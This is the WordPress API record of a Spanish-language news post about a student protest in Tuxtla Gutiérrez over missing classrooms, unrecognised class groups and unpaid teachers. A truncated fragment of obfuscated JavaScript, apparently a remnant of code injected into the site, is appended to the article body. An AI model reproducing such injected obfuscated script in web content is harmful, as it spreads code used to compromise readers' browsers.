{"id":11895,"date":"2023-09-21T04:20:20","date_gmt":"2023-09-21T04:20:20","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=11895"},"modified":"2023-09-21T04:20:21","modified_gmt":"2023-09-21T04:20:21","slug":"alumnos-de-secundaria-denuncian-falta-de-salones-y-maestros","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=11895","title":{"rendered":"Alumnos de secundaria denuncian falta de salones y maestros"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/FB_IMG_1695269893783-1024x768.jpg\" alt=\"\" class=\"wp-image-11896\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/FB_IMG_1695269893783-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/FB_IMG_1695269893783-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/FB_IMG_1695269893783-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/FB_IMG_1695269893783.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores. 20 de septiembre del 2023. Tuxtla Guti\u00e9rrez.- Alumnos de la Escuela Secundaria del Estado N\u00famero 3, localizada en la Colonia Jardines del Norte,  realizaron una protesta en el centro de Tuxtla Guti\u00e9rrez para exigir, la ampliaci\u00f3n de los grupos y dotar de infraestructura a esta instituci\u00f3n. Indicaron que, han acudido ante las autoridades en por lo menos 3 ocasiones, sin que les den atenci\u00f3n a este tema. Se\u00f1alaron que, la Secretar\u00eda de Educaci\u00f3n del Estado no ha oficializado, desde hace 5 a\u00f1os, tres grupos de la Escuela lo que motiv\u00f3 a que padres, profesores y alumnos a manifestarse. El docente de matem\u00e1ticas y fundador de la secundaria Horacio Nucamendi Nucamendi, dijo que, la instituci\u00f3n se creo para dar la posibilidad de estudios a chicos de la calle\u201d en una zona de cintur\u00f3n de pobreza en Tuxtla Guti\u00e9rrez; la escuela creci\u00f3 hasta tener un segundo grupo, el cual tuvo cobertura por un grupo de profesores sin base, pero con todo el perfil.\u201cDijo que,  aunque todos los documentos fueron entregados a la Secretaria, no se oficializ\u00f3 y al no hacerlo, el grupo de maestros que sub\u00edan solamente a cubrir esas horas, por problema de econom\u00eda y de incertidumbre tuvieron que abandonar la escuela\u201d, expres\u00f3. Esto gener\u00f3 que los grupos de primero y tercero B dejar\u00e1n de atenderse, y que los docentes de base den clases a grupos altamente cargados afectando su calidad educativa.El docente agreg\u00f3 que, \u201cNos han abierto mesa de di\u00e1logo pero no hemos visto absolutamente nada de soluci\u00f3n, no hay respuesta, en la actualidad los maestros de base, que tambi\u00e9n nos adeudan los grupos b, seguimos atendiendo como corresponde a la matr\u00edcula, dando clases a 50 alumnos por grupo y dejando a por lo menos 20 alumnos fuera de la escuela\u201d.La demanda principal es la ampliaci\u00f3n de los grupos, y se asignen docentes sin importar que para ellos se realicen evaluaciones a docentes. Y que a los maestros que est\u00e1n trabajando con los grupos B se les paguen los a\u00f1os de trabajo.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores. 20 de septiembre del 2023. Tuxtla Guti\u00e9rrez.- Alumnos de la Escuela Secundaria del Estado N\u00famero 3, localizada en la Colonia Jardines del Norte, realizaron una protesta en el centro de Tuxtla Guti\u00e9rrez para exigir, la ampliaci\u00f3n de los grupos y dotar de infraestructura a esta instituci\u00f3n. Indicaron que, han acudido ante las autoridades &hellip;<\/p>\n","protected":false},"author":2,"featured_media":11896,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-11895","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11895","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11895"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11895\/revisions"}],"predecessor-version":[{"id":11897,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11895\/revisions\/11897"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/11896"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11895"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=11895"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=11895"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}